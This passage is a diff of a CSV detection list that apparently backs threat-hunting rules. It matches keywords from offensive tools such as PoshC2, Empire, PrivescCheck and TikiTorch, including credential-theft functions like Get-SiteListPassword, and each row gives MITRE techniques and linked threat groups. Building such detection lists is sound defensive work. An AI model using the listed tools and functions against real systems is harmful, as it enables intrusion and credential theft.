- T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get-screenshotallwindows*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-SecurityPackages.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ShadowCopies*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-SccmCacheFolder*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*get-screenshot*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-screenshotallwindows*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-SecurityPackages.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ShadowCopies*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*GetShellcode(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" -"*Get-SitelistFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*getsploit*","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","10","1667","255","2023-03-27T15:18:55Z","2017-06-04T09:31:44Z" -"*Get-SPN.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SitelistFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getsploit*","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","10","1668","255","2023-03-27T15:18:55Z","2017-06-04T09:31:44Z" +"*Get-SPN.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-spns All*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-spns ASREP*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-spns spns*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" -"*Get-SQLInstanceDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SQLInstanceDomain.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SQLInstanceDomain.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - 